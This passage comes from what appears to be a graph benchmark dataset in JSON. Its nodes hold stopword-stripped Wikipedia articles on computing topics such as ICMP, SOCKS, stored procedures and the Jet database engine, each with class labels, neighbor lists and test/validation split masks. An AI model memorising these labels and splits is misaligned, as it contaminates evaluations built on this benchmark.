recursively defines components make expression order must appear however rules defining programming languages expressed context-free grammars alone example type validity proper declaration identifiers rules formally expressed attribute grammars final phase semantic parsing analysis working implications expression validated taking appropriate action case calculator interpreter action evaluate expression program compiler hand would generate kind code attribute grammars also used define actions task parser essentially determine input derived start symbol grammar done essentially two ways parsers recursive-descent parser examples top-down parsers accommodate left recursive production rules although believed simple implementations top-down parsing accommodate direct indirect left-recursion may require exponential time space complexity parsing ambiguous context-free grammars sophisticated algorithms top-down parsing created frost hafiz callaghan accommodate ambiguity left recursion polynomial time generate polynomial-size representations potentially exponential number parse trees algorithm able produce left-most right-most derivations input regard given context-free grammar important distinction regard parsers whether parser generates leftmost derivation rightmost derivation see context-free grammar parsers generate leftmost derivation lr parsers generate rightmost derivation although usually reverse algorithms designed visual programming languages parsers visual languages sometimes based graph grammars adaptive parsing algorithms used construct self-extending natural language user interfaces well known parser development tools include following also see comparison parser generators lookahead establishes maximum incoming tokens parser use decide rule use lookahead especially relevant lr lalr parsers often explicitly indicated affixing lookahead algorithm name parentheses lalr 1 programming languages primary target parsers carefully defined way parser limited lookahead typically one parse parsers limited lookahead often efficient one important change trend came 1990 terence parr created antlr ph.d. thesis parser generator efficient k parsers k fixed value lr parsers typically actions seeing token shift add token stack later reduction reduce pop tokens stack form syntactic construct end error known rule applies conflict know whether shift reduce lookahead two advantages example parsing expression programming languages except apl smalltalk algebraic formulas give higher precedence multiplication addition case correct interpretation example note rule4 semantic rule possible rewrite grammar incorporate syntax however rules translated syntax initially input 1 2 3 parse tree resulting code correct according language semantics correctly parse without lookahead three solutions parse tree generated correct simply non-lookahead parsers strategy followed lalr parsers",
    "neighbors": [
      2050,
      5122,
      5635,
      2059,
      1552,
      1044,
      2582,
      538,
      2599,
      3624,
      10791,
      10794,
      6188,
      4662,
      2103,
      3127,
      6208,
      9796,
      8262,
      74,
      5197,
      6223,
      2144,
      6242,
      7780,
      10340,
      8295,
      4092,
      1649,
      116,
      2167,
      119,
      4733,
      6795,
      6798,
      9871,
      5781,
      8866,
      2222,
      4293,
      11475,
      5857,
      10474,
      8188,
      8440,
      11516,
      1277,
      4350,
      7430,
      2316,
      2831,
      5904,
      11538,
      1308,
      3876,
      9008,
      2866,
      4919,
      7479,
      10557,
      6976,
      331,
      1363,
      8538,
      11610,
      10593,
      1890,
      5478,
      9062,
      8554,
      8046,
      882,
      7026,
      4468,
      4980,
      10610,
      1922,
      8582,
      2440,
      2457,
      3998,
      1952,
      4519,
      7599,
      3507,
      4531,
      2488,
      8644,
      3533,
      5585,
      1490,
      7634,
      11228,
      479,
      8677,
      4070,
      8688,
      9714,
      10231,
      7164,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5400,
    "label": 3,
    "text": "RoboCop_(1988_video_game):robocop 1988 video game robocop beat 'em up/run gun arcade game developed published data east 1988 based 1987 film name sub-licensed data east ocean software obtained rights orion pictures script stage robocop hybrid game featuring elements beat 'em well run gun titles despite arcade game numerous versions appeared home computers video game consoles first group released 1988 apple ii pc compatibles amiga atari st apple pc ports developed quicksilver software amiga st versions developed directly ocean data east published game north america nes port followed 1989 developed sakata sas co version trs-80 coco 3 ocean developed published version game boy 1990 1989 ocean released different robocop game bore loose resemblance arcade version produced commodore 64 msx zx spectrum tandy color computer 3 amstrad cpc well pc compatibles meaning pcs ended two entirely different robocop games north american european audiences many ocean c64 titles cassette disk versions released north american release also published data east based disk version c64 robocop versions notorious high numbers bugs 2015 cracker group nostalgia released completely bug-fixed robocop compatible pal ntsc machines port game atari jaguar planned never released zx spectrum version robocop achieved particular critical success receiving crash smash award crash 94 sinclair user sinclair gave 8.8 10 also placing number 94 sinclair official top 100 overall opinion game better original arcade game capture original material smooth scrolling animation sampled speech sound effects highlighted addition zx spectrum robocop one biggest selling games time platform number one sales charts year half entered charts april 1989 still top five february 1991 readers ys voted 9th best game time title theme ocean software versions composed jonathan dunn become well known serene calm tune heavily contrasted tone actual game source material version theme heard game boy port later licensed european kitchen appliance company ariston use series tv adverts song also used theme song charlie brooker documentary videogames changed world well music internet short dilbert 3 song sampled lil b song bad mixtape white flame",
    "neighbors": [
      7269,
      9006,
      2159,
      1776,
      6129,
      7281,
      9166,
      6485,
      6390,
      10679
    ],
    "mask": "Test"
  },
  {
    "node_id": 5401,
    "label": 1,
    "text": "Microsoft_Jet_Database_Engine:microsoft jet database engine microsoft jet database engine also microsoft jet engine simply jet database engine several microsoft products built first version jet developed 1992 consisting three modules could used manipulate database jet stands joint engine technology microsoft access visual basic use used jet underlying database engine however superseded general use first microsoft desktop engine msde later sql server express larger database needs jet databases upgraded microsoft parlance up-sized microsoft flagship sql server database product however mean ms jet red database match ms sql server storage capacity 5 billion record ms jet red database compression encryption turned requires 1 terabyte disk storage space comprising hundreds *.mdb files acting partial table database jet part relational database management system rdbms allows manipulation relational databases offers single interface software use access microsoft databases provides support security referential integrity transaction processing indexing record page locking data replication later versions engine extended run sql queries store character data unicode format create database views allow bi-directional replication microsoft sql server three modules jet one native jet isam driver dynamic link library dll directly manipulate microsoft access database files mdb using indexed sequential access method isam another one modules contains isam drivers dlls allow access variety isam databases among xbase paradox btrieve foxpro depending version jet final module data access objects dao dll dao provides api allows programmers access jet databases using programming language jet allows multiple users access database concurrently prevent data corrupted invalidated multiple users try edit record page database jet employs locking policy single user modify database records items database user applied lock gives exclusive access record lock released jet versions version 4 page locking model used jet 4 record locking model employed microsoft databases organized data pages fixed-length 2 kb jet 4 4 kb jet 4 data structures data stored records variable length may take less one page page locking model works locking pages instead individual records though less resource-intensive also means user locks one record records page collaterally locked result user access collaterally locked records even though user accessing need locked jet 4 record locking model eliminates collateral locks every record use available two mechanisms microsoft uses locking pessimistic locking optimistic locking pessimistic locking record page locked immediately lock requested optimistic locking locking delayed edited record saved conflicts less likely occur optimistic locking since record locked short period time however optimistic locking one certain update succeed another user could lock record first pessimistic locking update guaranteed succeed lock obtained users must wait lock released order make changes lock conflicts either require user wait cause request fail usually timeout common pessimistic locking jet supports transaction processing database systems capability odbc systems one-level transaction processing several isam systems like paradox support transaction processing transaction series operations performed database must done together — known atomicity one acid atomicity consistency isolation durability concepts considered key transaction processing features database management system transaction processing work jet 3.0 programmer needed begin transaction manually perform operations needed performed transaction commit save transaction transaction committed changes made memory actually written disk transactions number advantages independent database updates one main advantages transactions abandoned problem occurs transaction called rolling back transaction rollback restores state database records precisely state transaction began transactions also permit state database remain consistent system failure occurs middle sequence updates required atomic chance updates end written database either succeed changes discarded database system restarts odbc in-memory policy transactions also allow many updates record occur entirely within memory one expensive disk write end implicit transactions supported jet 3.0 transactions started automatically last transaction committed database implicit transactions jet occurred sql dml statement issued however found negative performance impact 32-bit windows windows 95 windows 98 jet 3.5 microsoft removed implicit transactions sql dml statements made jet enforces entity integrity referential integrity jet default prevent change record breaks referential integrity jet databases instead use propagation constraints cascading updates cascading deletes maintain referential integrity jet also supports business rules also known constraints rules apply column enforce data might placed table column example rule might applied allow date entered date_logged column earlier current date time rule might applied forces people enter positive value numeric field access jet databases done per user-level user information kept separate system database access controlled object system instance table query jet 4 microsoft implemented functionality allows database administrators set security via sql commands create add alter drop user drop group commands subset ansi sql 92 standard also apply grant/revoke commands jet 2 released security could also set programmatically dao queries mechanisms jet uses retrieve data database defined microsoft qbe query example microsoft access sql window access basic data access objects dao language converted sql select statement query compiled — involves parsing query involves syntax checking determining columns query database table converted internal jet query object format tokenized organised tree like structure jet 3.0 onwards optimised using microsoft rushmore query optimisation technology query executed results passed back application user requested data jet passes data retrieved query dynaset set data dynamically linked back database instead query result stored temporary table data updated directly user dynaset allows user view update data contained dynaset thus university lecturer queries students received distinction assignment finds error student record would need update data dynaset would automatically update student database record without need send specific update query storing query results temporary table jet originally started 1992 underlying data access technology came microsoft internal database product development project code named cirrus cirrus developed pre-release version visual basic code used database engine microsoft access tony goodhew worked microsoft time says would reasonably accurate say stage jet name team assigned work db engine modules access rather component team vb visual basic 3.0 basically tear access graft onto vb 've jet/odbc problems vb 3.0 jet became componentised access 2.0 released access odbc developers used parts jet code produce odbc driver retrofit provided allowed visual basic 3.0 users use updated jet issued access 2.0 jet 2.0 released several dynamic linked libraries dlls utilised application software microsoft access database dlls windows libraries common code used one application—by keeping code one application uses common library applications use independently code maintenance reduced functionality applications increases less development effort jet 2.0 comprised three dlls jet dll data access objects dao dll several external isam dlls jet dll determined sort database accessing perform requested data source mdb file microsoft access format would directly read write data file data source external would call correct odbc driver perform request dao dll component programmers could use interface jet engine mainly used visual basic access basic programmers isam dlls set modules allowed jet access three isam based databases xbase paradox btrieve jet 2.0 replaced jet 2.1 used database structure different locking strategies making incompatible jet 2.0 jet 3.0 included many enhancements including new index structure reduced storage size time taken create indices highly duplicated removal read locks index pages new mechanism page reuse new compacting method compacting database resulted indices stored clustered-index format new page allocation mechanism improve jet read-ahead capabilities improved delete operations speeded processing multithreading three threads used perform read ahead write behind cache maintenance implicit transactions users instruct engine start manually commit transactions database new sort engine long values memos binary data types stored separate tables dynamic buffering whereby jet cache dynamically allocated start limit changed first first fifo buffer replacement policy least recently used lru buffer replacement policy jet 3.0 also allowed database replication jet 3.0 replaced jet 3.5 uses database structure different locking strategies making incompatible jet 3.0 jet 4.0 gained numerous additional features enhancements microsoft access versions access 2000 access 2010 included upsizing wizard could upsize upgrade jet database equivalent database sql server table structure data many attributes original database reports queries macros security handled tool meaning manual modifications might needed application heavily reliant jet features standalone version jet 4 database engine component microsoft data access components mdac included every version windows windows 2000 jet database engine 32-bit run natively 64-bit versions windows meant native 64-bit applications 64-bit versions sql server could access data stored mdb files odbc ole db means except intermediate 32-bit software running wow64 acted proxy 64-bit client version 2007 onwards access includes office-specific version jet initially called office access connectivity engine ace called access database engine however ms-access consultants vba developers specialize ms-access likely refer ace database engine engine backward-compatible previous versions jet engine could read write .mdb files earlier access versions introduced new default file format .accdb brought several improvements access including complex data types multivalue fields attachment data type history tracking memo fields also brought security changes encryption improvements enabled integration microsoft windows sharepoint services 3.0 microsoft office outlook 2007 engine microsoft access 2010 discontinued support access 1.0 access 2.0 lotus 1-2-3 paradox files 64-bit version access 2010 ace driver/provider introduced essence provides 64-bit version jet driver part windows operating system available redistributable engine microsoft access 2013 discontinued support access 95 access 97 xbase files also discontinued support replication version 1608 microsoft access 2016 restored support xbase files version 1703 introduced large number data type data access technology standpoint jet considered deprecated technology microsoft microsoft continues support ace part microsoft access microsoft provides jet drivers microsoft windows therefore third party software support jet databases almost exclusively found windows open source project attempts enable working jet databases platforms mdb tools much extended java port named jackcess",
    "neighbors": [
      10243,
      3591,
      10769,
      9234,
      1043,
      6166,
      5658,
      1055,
      2083,
      8227,
      4647,
      1577,
      10286,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      4674,
      9286,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      8804,
      5225,
      1656,
      5754,
      8315,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      10899,
      10900,
      10902,
      11414,
      3224,
      4771,
      7846,
      10413,
      10414,
      8391,
      5320,
      8393,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      5356,
      3821,
      10991,
      2804,
      6927,
      8976,
      9491,
      7446,
      11030,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      315,
      7486,
      5952,
      10048,
      1347,
      1348,
      844,
      847,
      1366,
      4439,
      10079,
      11616,
      2401,
      7523,
      6521,
      2943,
      9609,
      9612,
      2456,
      7064,
      9114,
      10654,
      8607,
      11683,
      3496,
      7080,
      4010,
      10157,
      6584,
      2493,
      7629,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3570,
      3573,
      4598,
      9205,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 5402,
    "label": 5,
    "text": "Internet_Control_Message_Protocol:internet control message protocol internet control message protocol icmp supporting protocol internet protocol suite used network devices including routers send error messages operational information indicating example requested service available host router could reached icmp differs transport protocols tcp udp typically used exchange data systems regularly employed end-user network applications exception diagnostic tools like ping traceroute icmp ipv4 defined rfc 792 icmp part internet protocol suite defined rfc 792 icmp messages typically used diagnostic control purposes generated response errors ip operations specified rfc 1122 icmp errors directed source ip address originating packet example every device intermediate router forwarding ip datagram first decrements time live ttl field ip header one resulting ttl 0 packet discarded icmp time exceeded transit message sent datagram source address many commonly used network utilities based icmp messages traceroute command implemented transmitting ip datagrams specially set ip ttl header fields looking icmp time exceeded transit destination unreachable messages generated response related ping utility implemented using icmp echo request echo reply messages icmp uses basic support ip higher level protocol however icmp actually integral part ip although icmp messages contained within standard ip packets icmp messages usually processed special case distinguished normal ip processing many cases necessary inspect contents icmp message deliver appropriate error message application responsible transmission ip packet prompted sending icmp message icmp network layer protocol tcp udp port number associated icmp packets numbers associated transport layer icmp packet encapsulated ipv4 packet packet consists header data sections icmp header starts ipv4 header identified ip protocol number 1 icmp packets 8-byte header variable-sized data section first 4 bytes header fixed format last 4 bytes depend type/code icmp packet icmp error messages contain data section includes copy entire ipv4 header plus least first eight bytes data ipv4 packet caused error message maximum length icmp error messages 576 bytes data used host match message appropriate process higher level protocol uses port numbers assumed first eight bytes original datagram data variable size icmp packet data section exploited ping death large fragmented ping packets used denial-of-service attacks icmp data also used create covert channels communication channels known icmp tunnels control messages identified value type field code field gives additional context information message control messages deprecated since protocol first introduced source quench requests sender decrease rate messages sent router host message may generated router host sufficient buffer space process request may occur router host buffer approaching limit data sent high speed host several hosts time particular router network although router buffering capabilities buffering limited within specified range router queue data capacity limited buffering space thus queue gets filled incoming data discarded queue longer full acknowledgement mechanism present network layer client know whether data reached destination successfully hence remedial measures taken network layer avoid kind situations measures referred source quench source quench mechanism router sees incoming data rate much faster outgoing data rate sends icmp message clients informing slow data transfer speeds wait certain amount time attempting send data client receives message automatically slow outgoing data rate wait sufficient amount time enables router empty queue thus source quench icmp message acts flow control network layer since research suggested icmp source quench ineffective unfair antidote congestion routers creation source quench messages deprecated 1995 rfc 1812 furthermore forwarding kind reaction flow control actions source quench messages deprecated 2012 rfc 6633 redirect requests data packets sent alternative route icmp redirect mechanism routers convey routing information hosts message informs host update routing information send packets alternative route host tries send data router r1 r1 sends data another router r2 direct path host r2 available host r2 ethernet segment r1 send redirect message inform host best route destination via r2 host send packets destination directly r2 router still send original datagram intended destination however datagram contains routing information message sent even better route available rfc 1122 states redirects sent gateways sent internet hosts time exceeded generated gateway inform source discarded datagram due time live field reaching zero time exceeded message may also sent host fails reassemble fragmented datagram within time limit time exceeded messages used traceroute utility identify gateways path two hosts timestamp used time synchronization originating timestamp set time milliseconds since midnight sender last touched packet receive transmit timestamps used timestamp reply replies timestamp message consists originating timestamp sent sender timestamp well receive timestamp indicating timestamp received transmit timestamp indicating timestamp reply sent address mask request normally sent host router order obtain appropriate subnet mask recipients reply message address mask reply message icmp address mask request may used part reconnaissance attack gather information target network therefore icmp address mask reply disabled default cisco ios address mask reply used reply address mask request message appropriate subnet mask destination unreachable generated host inbound gateway inform client destination unreachable reason reasons message may include physical connection host exist distance infinite indicated protocol port active data must fragmented 'do n't fragment flag unreachable tcp ports notably respond tcp rst rather destination unreachable type 3 might expected destination unreachable never reported ip multicast transmissions",
    "neighbors": [
      10242,
      1541,
      1030,
      14,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11319,
      11321,
      3133,
      5181,
      6723,
      11332,
      581,
      8265,
      8266,
      4687,
      6735,
      1618,
      10852,
      10341,
      9318,
      10344,
      3695,
      4723,
      2679,
      4729,
      5761,
      5251,
      9860,
      649,
      2185,
      7817,
      9868,
      3218,
      9365,
      11413,
      152,
      5785,
      2206,
      3742,
      7329,
      9380,
      9381,
      3751,
      3752,
      7336,
      3755,
      172,
      10924,
      6318,
      7855,
      6834,
      2739,
      9909,
      4793,
      7865,
      1211,
      4797,
      702,
      7364,
      11461,
      11464,
      8905,
      1229,
      5843,
      6364,
      6877,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      5875,
      3322,
      2299,
      4349,
      9987,
      3847,
      2827,
      1297,
      10005,
      6422,
      5405,
      8998,
      8487,
      9511,
      9727,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      5440,
      9024,
      2373,
      2887,
      10058,
      6992,
      849,
      1876,
      3924,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      2409,
      367,
      7031,
      891,
      6523,
      6524,
      2430,
      2431,
      7037,
      11647,
      10115,
      6541,
      4495,
      2960,
      3473,
      7570,
      8080,
      5531,
      10144,
      10659,
      3492,
      933,
      4005,
      2983,
      6577,
      2996,
      5045,
      9146,
      10171,
      3006,
      7102,
      3011,
      9670,
      2509,
      8653,
      3024,
      5589,
      4054,
      8664,
      8669,
      8670,
      10723,
      4071,
      10727,
      3564,
      4589,
      11249,
      11250,
      8692,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5403,
    "label": 1,
    "text": "Stored_procedure:stored procedure stored procedure also termed proc storp sproc stopro storedproc storeproc sp sp subroutine available applications access relational database management system rdbms procedures stored database data dictionary uses stored procedures include data-validation integrated database access-control mechanisms furthermore stored procedures consolidate centralize logic originally implemented applications save time memory extensive complex processing requires execution several sql statements saved stored procedures applications call procedures one use nested stored procedures executing one stored procedure within another stored procedures may return result sets i.e. results codice_1 statement result sets processed using cursors stored procedures associating result-set locator applications stored procedures may also contain declared variables processing data cursors allow loop multiple rows table stored-procedure flow-control statements typically include codice_2 codice_3 codice_4 codice_5 codice_6 statements stored procedures receive variables return results modify variables return depending variable declared stored procedures similar user-defined functions udfs major difference udfs used like expression within sql statements whereas stored procedures must invoked using codice_7 statement exact correct implementation stored procedures varies one database system major database vendors support form depending database system stored procedures implemented variety programming languages example sql java c c++ stored procedures written non-sql languages may may execute sql statements increasing adoption stored procedures led introduction procedural elements sql language standards part sql/psm made sql imperative programming language database systems offer proprietary vendor-specific extensions exceeding sql/psm standard specification java stored procedures exists well sql/jrt systems stored procedures used control transaction management others stored procedures run inside transaction transactions effectively transparent stored procedures also invoked database trigger condition handler example stored procedure may triggered insert specific table update specific field table code inside stored procedure would executed writing stored procedures condition handlers also allows database administrators track errors system greater detail using stored procedures catch errors record audit information database external resource like file prepared statements take ordinary statement query parameterize different literal values used later time like stored procedures stored server efficiency provide protection sql injection attacks although simpler declarative prepared statements ordinarily written use procedural logic operate variables simple interface client-side implementations prepared statements widely reusable dbms",
    "neighbors": [
      5641,
      522,
      8201,
      2063,
      2068,
      1049,
      5658,
      9248,
      5669,
      10793,
      5677,
      10286,
      6709,
      5691,
      11324,
      8262,
      9286,
      2632,
      9290,
      6219,
      11339,
      8788,
      10326,
      7767,
      10849,
      9828,
      10340,
      8808,
      2669,
      1146,
      3196,
      3712,
      9360,
      10389,
      4255,
      4263,
      9389,
      10413,
      2737,
      7347,
      9397,
      3254,
      7868,
      6850,
      5827,
      2246,
      5833,
      10459,
      2780,
      734,
      736,
      10471,
      6383,
      5364,
      7412,
      270,
      8979,
      7446,
      11030,
      11552,
      7461,
      2344,
      1341,
      1856,
      2369,
      5953,
      10048,
      10573,
      2901,
      10069,
      8539,
      8028,
      7523,
      1383,
      7022,
      9075,
      6522,
      10624,
      10632,
      2456,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      5549,
      3004,
      987,
      4065,
      3045,
      7654,
      6124,
      2544,
      10737,
      3573,
      4598,
      4604,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5404,
    "label": 4,
    "text": "Application_security:application security application security encompasses measures taken improve security application often finding fixing preventing security vulnerabilities different techniques used surface security vulnerabilities different stages applications lifecycle design development deployment upgrade maintenance always evolving largely consistent set common security flaws seen across different applications see common flaws different techniques find different subsets security vulnerabilities lurking application effective different times software lifecycle represent different tradeoffs time effort cost vulnerabilities found utilizing techniques appropriately throughout software development life cycle sdlc maximize security role application security team according patterns practices improving web application security book following classes common application security threats attacks owasp community publishes list top 10 vulnerabilities web applications outlines best security practices organizations aiming create open standards industry 2017 organization lists top application security threats proportion mobile devices providing open platform functionality expected continue increase future openness platforms offers significant opportunities parts mobile eco-system delivering ability flexible program service delivery= options may installed removed refreshed multiple times line user ’ needs requirements however openness comes responsibility unrestricted access mobile resources apis applications unknown untrusted origin could result damage user device network managed suitable security architectures network precautions application security provided form open os mobile devices symbian os microsoft brew etc. 2017 google expanded vulnerability reward program cover vulnerabilities found applications developed third parties made available google play store industry groups also created recommendations including gsm association open mobile terminal platform omtp several strategies enhance mobile application security including security testing techniques scour vulnerabilities security holes applications vulnerabilities leave applications open exploitation ideally security testing implemented throughout entire software development life cycle sdlc vulnerabilities may addressed timely thorough manner unfortunately testing often conducted afterthought end development cycle growth continuous delivery devops popular software development deployment models continuous security models becoming popular vulnerability scanners specifically web application scanners otherwise known penetration testing tools i.e ethical hacking tools historically used security organizations within corporations security consultants automate security testing http request/responses however substitute need actual source code review physical code reviews application source code accomplished manually automated fashion given common size individual programs often 500,000 lines code human brain execute comprehensive data flow analysis needed order completely check circuitous paths application program find vulnerability points human brain suited filtering interrupting reporting outputs automated source code analysis tools available commercially versus trying trace every possible path compiled code base find root cause level vulnerabilities many kinds automated tools identifying vulnerabilities applications require great deal security expertise use others designed fully automated use results dependent types information source binary http traffic configuration libraries connections provided tool quality analysis scope vulnerabilities covered common technologies used identifying application vulnerabilities include static application security testing sast technology frequently used source code analysis tool method analyzes source code security vulnerabilities prior launch application used strengthen code method produces fewer false positives implementations requires access application source code requires expert configuration lots processing power dynamic application security testing dast technology able find visible vulnerabilities feeding url automated scanner method highly scalable easily integrated quick dast drawbacks lie need expert configuration high possibility false positives negatives interactive application security testing iast solution assesses applications within using software instrumentation technique allows iast combine strengths sast dast methods well providing access code http traffic library information backend connections configuration information iast products require application attacked others used normal quality assurance testing advances professional malware targeted internet customers online organizations seen change web application design requirements since 2007 generally assumed sizable percentage internet users compromised malware data coming infected host may tainted therefore application security begun manifest advanced anti-fraud heuristic detection systems back-office rather within client-side web server code 2016 runtime application self-protection rasp technologies developed rasp technology deployed within alongside application runtime environment instruments application enables detection prevention attacks cert coordination center describes coordinated vulnerability disclosure cvd “ process reducing adversary advantage information security vulnerability mitigated. ” cvd iterative multi-phase process involves multiple stakeholders users vendors security researchers may different priorities must work together resolve vulnerability cvd processes involve multiple stakeholders managing communication vulnerability resolution critical success operational perspective many tools processes aid cvd include email web forms bug tracking systems coordinated vulnerability platforms",
    "neighbors": [
      5636,
      10756,
      6665,
      2084,
      1573,
      3629,
      7739,
      9791,
      11333,
      2118,
      4681,
      9293,
      87,
      4198,
      107,
      3698,
      5245,
      5246,
      9345,
      130,
      9356,
      2705,
      4755,
      10392,
      1689,
      10909,
      2213,
      7337,
      9901,
      7855,
      11446,
      2238,
      3262,
      2758,
      711,
      7368,
      9926,
      9932,
      5325,
      4820,
      2262,
      6360,
      3290,
      731,
      2779,
      2275,
      6373,
      4843,
      2294,
      5880,
      9467,
      10492,
      5373,
      4863,
      6406,
      1808,
      9488,
      8978,
      6423,
      8471,
      4892,
      1314,
      8998,
      3880,
      3887,
      7983,
      5433,
      11588,
      11081,
      331,
      4435,
      2901,
      1369,
      7515,
      4956,
      1890,
      3941,
      2409,
      4471,
      899,
      7557,
      9607,
      10633,
      3473,
      2975,
      8613,
      939,
      1453,
      9646,
      1970,
      11186,
      8122,
      10682,
      6588,
      1474,
      3525,
      1480,
      3529,
      9160,
      3021,
      11213,
      8657,
      9688,
      6636,
      11244,
      9710,
      9714,
      8694,
      4087,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5405,
    "label": 5,
    "text": "SOCKS:socks socks internet protocol exchanges network packets client server proxy server socks5 additionally provides authentication authorized users may access server practically socks server proxies tcp connections arbitrary ip address provides means udp packets forwarded socks performs layer 5 osi model session layer intermediate layer presentation layer transport layer socks server accepts incoming client connection tcp port 1080 protocol originally developed/designed david koblas system administrator mips computer systems mips taken silicon graphics 1992 koblas presented paper socks year usenix security symposium making socks publicly available protocol extended version 4 ying-da lee nec socks reference architecture client owned permeo technologies spin-off nec blue coat systems bought permeo technologies socks5 protocol originally security protocol made firewalls security products easier administer approved ietf 1996 protocol developed collaboration aventail corporation markets technology outside asia socks de facto standard circuit-level gateways another use socks circumvention tool allowing traffic bypass internet filtering access content otherwise blocked e.g. governments workplaces schools country-specific web services ssh suites openssh support dynamic port forwarding allows user create local socks proxy free user limitations connecting predefined remote port server tor onion proxy software presents socks interface clients hacked computers may configured socks proxy software obscuring control botnet optimise credit card fraud socks operates lower level http proxying socks uses handshake protocol inform proxy software connection client trying make acts transparently possible whereas regular proxy may interpret rewrite headers say employ another underlying protocol ftp however http proxy simply forwards http request desired http server though http proxying different usage model mind connect method allows forwarding tcp connections however socks proxies also forward udp traffic work reverse http proxies http proxies traditionally aware http protocol performing higher-level filtering though usually applies get post methods connect method bill wishes communicate jane internet firewall exists network bill authorized communicate jane directly bill connects socks proxy network informing connection wishes make jane socks proxy opens connection firewall facilitates communication bill jane information technical specifics socks protocol see sections bill wishes download web page jane runs web server bill directly connect jane server firewall put place network order communicate server bill connects network http proxy web browser communicates proxy exactly way would directly jane server possible sends standard http request header http proxy connects jane server transmits back bill data jane server returns typical socks4 connection request looks like socks client socks server socks server socks client example socks4 request connect fred 66.102.7.99:80 server replies ok point onwards data sent socks client socks server relayed 66.102.7.99 vice versa command field may 0x01 connect 0x02 bind bind command allows incoming connections protocols active ftp socks4a extends socks4 protocol allow client specify destination domain name rather ip address useful client resolve destination host domain name ip address client set first three bytes dstip null last byte non-zero value corresponds ip address 0.0.0.x x nonzero inadmissible destination address thus never occur client resolve domain name following null byte terminating userid client must send destination domain name terminate another null byte used connect bind requests client socks server server socks client server using protocol socks4a must check dstip request packet represents address 0.0.0.x nonzero x server must read domain name client sends packet server resolve domain name make connection destination host socks5 protocol defined rfc 1928 extension socks4 protocol offers choices authentication adds support ipv6 udp latter used dns lookups initial handshake consists following authentication methods supported numbered follows initial greeting client server choice communicated subsequent authentication method-dependent username password authentication method 0x02 described rfc 1929 username/password authentication client authentication request server response username/password authentication client connection request server response client software must native socks support order connect socks programs allow users circumvent limitations",
    "neighbors": [
      10242,
      10271,
      2085,
      7208,
      2093,
      562,
      3133,
      5181,
      11332,
      8265,
      4687,
      10341,
      10344,
      4725,
      9860,
      4229,
      649,
      1164,
      6797,
      9868,
      3218,
      9365,
      11413,
      2206,
      3742,
      8355,
      9380,
      9381,
      3751,
      3752,
      10924,
      5811,
      9909,
      1208,
      7865,
      4797,
      4287,
      3777,
      7873,
      7364,
      3792,
      5843,
      7895,
      8432,
      5875,
      3847,
      1297,
      4883,
      10005,
      5402,
      8998,
      5433,
      5437,
      10051,
      2887,
      6993,
      2904,
      5469,
      5470,
      5471,
      5472,
      1893,
      11112,
      367,
      7031,
      2431,
      10631,
      4490,
      5531,
      9117,
      2996,
      10171,
      3006,
      3520,
      2509,
      11250,
      4085,
      6651,
      5118
    ],
    "mask": "Test"
  },
  {
    "node_id": 5406,
    "label": 2,
    "text": "Nokia_X_platform:nokia x platform nokia x platform linux-based mobile operating system software platform originally developed nokia subsequently microsoft mobile introduced 24 february 2014 forked android used devices nokia x family also next nokia linux project ill-fated meego 17 july 2014 acquisition nokia devices unit microsoft announced nokia x smartphones introduced marking end nokia x platform within months introduction phones succeeded low-cost lumia devices microsoft mobile brand name nokia x software platform based android open source project aosp linux kernel nokia combined android apps nokia experiences maps nokia xpress mixradio microsoft services skype outlook nokia officially described software bringing best worlds also encompasses features asha platform fastlane notification centre user interface mimics windows phone os heavily compared amazon.com fire os also based aosp google applications replaced nokia microsoft first released google play store included nokia offering apps nokia store however since v2.1 update september 2014 users allowed install google play various google services third party tools users attempt install google services nokia x devices would usually get bricked would require nokia software recovery tool restore data february 2014 75 android apps compatible platform nokia also noted developers port remaining missing apps matter hours attempt encourage developers contribute platform previously added compatible android apps without developer approval sdk available platform includes emulator based android emulator nokia discouraging developers using windows phone design patterns encouraging android design guidelines nokia x. nokia vp developer relations commented nokia imaging sdk likely ported platform windows phone",
    "neighbors": [
      8576,
      10754,
      6787,
      6276,
      8829,
      11271,
      4364,
      6797,
      8976,
      3857,
      3477,
      1687,
      6301,
      4383,
      10016,
      10273,
      8098,
      3626,
      5677,
      9262,
      7727,
      3248,
      7857,
      7983,
      823,
      1083,
      321,
      7492,
      8262,
      9033,
      5067,
      2380,
      2892,
      6476,
      7246,
      9166,
      4305,
      2259,
      4051,
      7253,
      3542,
      3162,
      8413,
      607,
      5600,
      10080,
      3300,
      8423,
      10215,
      10599,
      9194,
      6763,
      2925,
      495,
      8316,
      5363,
      8315,
      1148,
      2045,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 5407,
    "label": 4,
    "text": "Blacklist_(computing):blacklist computing computing blacklist blocklist basic access control mechanism allows elements email addresses users passwords urls ip addresses domain names file hashes etc except explicitly mentioned items list denied access opposite whitelist means items list let whatever gate used greylist contains items temporarily blocked temporarily allowed additional step performed blacklists applied various points security architecture host web proxy dns servers email server firewall directory servers application authentication gateways type element blocked influenced access control location dns servers may well-suited block domain names example urls firewall well-suited blocking ip addresses less blocking malicious files passwords example uses include company might prevent list software running network school might prevent access list web sites computers business wants ensure computer users choosing easily guessed poor passwords blacklists used protect variety systems computing content blacklist likely needs targeted type system defended information system includes end-point hosts like user machines servers blacklist location may include certain types software allowed run company environment example company might blacklist peer peer file sharing systems addition software people devices web sites also blacklisted email providers anti-spam feature essentially blacklists certain email addresses deemed unwanted example user wearies unstoppable emails particular address may blacklist address email client automatically route messages address junk-mail folder delete without notifying user e-mail 